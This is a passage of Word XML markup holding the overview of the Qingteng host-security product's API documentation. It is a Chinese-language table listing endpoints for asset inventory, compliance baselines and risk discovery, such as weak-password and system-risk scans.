    <w:p w14:paraId="0BDD60EE" w14:textId="4719F133" w:rsidR="00F245F3" w:rsidRPr="000449B2" w:rsidRDefault="00F245F3" w:rsidP="00F245F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
        </w:rPr>
        <w:sectPr w:rsidR="00F245F3" w:rsidRPr="000449B2" w:rsidSect="009807A8">
          <w:pgSz w:w="11900" w:h="16840" w:code="9"/>
          <w:pgMar w:top="907" w:right="907" w:bottom="907" w:left="907" w:header="567" w:footer="283" w:gutter="0"/>
          <w:pgNumType w:fmt="upperRoman"/>
          <w:cols w:space="425"/>
          <w:docGrid w:type="lines" w:linePitch="423"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C4CCD97" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc89700436"/>
      <w:bookmarkStart w:id="4" w:name="_Toc93066654"/>
      <w:bookmarkStart w:id="5" w:name="_Toc99806772"/>
      <w:bookmarkStart w:id="6" w:name="概述"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>概述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7977DE90" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>青藤 API提供了青藤产品中部分功能的API获取接口，您可以利用该接口，灵活的获取各维度的信息，当前API提供如下查询 。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2261"/>
        <w:gridCol w:w="2482"/>
        <w:gridCol w:w="5339"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4061A2F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6A229CF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>功能名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="162AA878" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>接口作用</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D8DB4E5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>接口名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7BF26495" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CB59540" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>资产清点 - 主机信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D2BA8F1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EFD0695" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/assets/host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7E51F5E5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D099C0C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>资产清点 - 进程信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14B42BD7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F02826A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/assets/process</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6337304B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="295346C8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>资产清点 - 端口信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7ACF3268" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79CDB21E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/assets/port</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="71C3669F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57448FC7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>资产清点 - 帐号信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C4C99A9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>帐号扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21AFD677" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/assets/account</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="42FD1E88" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7044E855" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>资产清点 - 用户组信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E91E769" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户组扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E677B96" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/assets/accountgroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="106C9D0A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0389169C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>资产清点 - Web站点信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D3511EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>web站点扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37FD6DDE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/assets/website</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="09406D7F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31D155BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>资产清点 - Web 应用信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46D2E39D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>web应用扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2372E178" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/assets/webapp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5297C367" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07B55DC2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>资产清点 - 软件应用</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53DA8CEE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>软件应用扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="025D5BCF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/assets/app</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6855F656" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="233030E5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>资产清点 - Web应用框架</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AD08FF2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Web应用框架扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E2EE6B7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/assets/webframe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7E9DE55E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44D824D2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>资产清点 - 数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3309757D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>数据库扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CED1727" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/assets/dbinfo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="23C21B06" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A753BD1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>资产清点 - 启动项</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E846D5C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>启动项扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4964313F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/assets/service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="513A87C9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6893868D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>资产清点 - 计划任务</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E9DB319" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>计划任务扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02ECCB29" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/assets/task</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="63331BF0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D780416" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>资产清点 - 环境变量</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10419736" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>环境变量扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F52B694" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/assets/env</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="630AD8B7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AC3ADAA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>资产清点 - 内核模块</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FEA26AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内核模块扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54DAA578" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/assets/kernelmodule</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="10A43E5B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3228C271" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>资产清点 - 安装包</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60B83A59" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>安装包扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16A3453F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/assets/pkg</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="75613EE6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07F8F2F1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>资产清点 - Jar包</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="748CBEC5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Jar包扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="567F86BF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/assets/jar_pkg</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0AC45770" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EB704E0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>合规基线</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E42E103" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>基线扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26BF0F8D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/baseline</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6B3C8852" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="295B148B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险发现 - Web风险文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="262FDC75" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>web风险文件扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="152944AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/websecurity/weakfile</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="666A658A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C46AC13" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险发现 - 应用风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E44192A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>应用风险扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="658625F0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/vul/app</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2FD3CC51" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AC65AEB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险发现 - 系统风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="469A9F8B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>系统风险扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34E77DD9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/vul/system</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="68078EDE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B521B23" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险发现 - 对外访问性</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47E7F424" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>对外访问性扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="288DEE9C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/vul/access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="206661F8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0500BD55" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险发现 - 账号风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="086C21D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>账号风险扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="375A5B1E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/vul/account</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="576B4396" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12C9394B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险发现 - Linux弱密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CA7AFB0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Linux弱密码扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="580BCAAD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/vul/weakpwd/linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
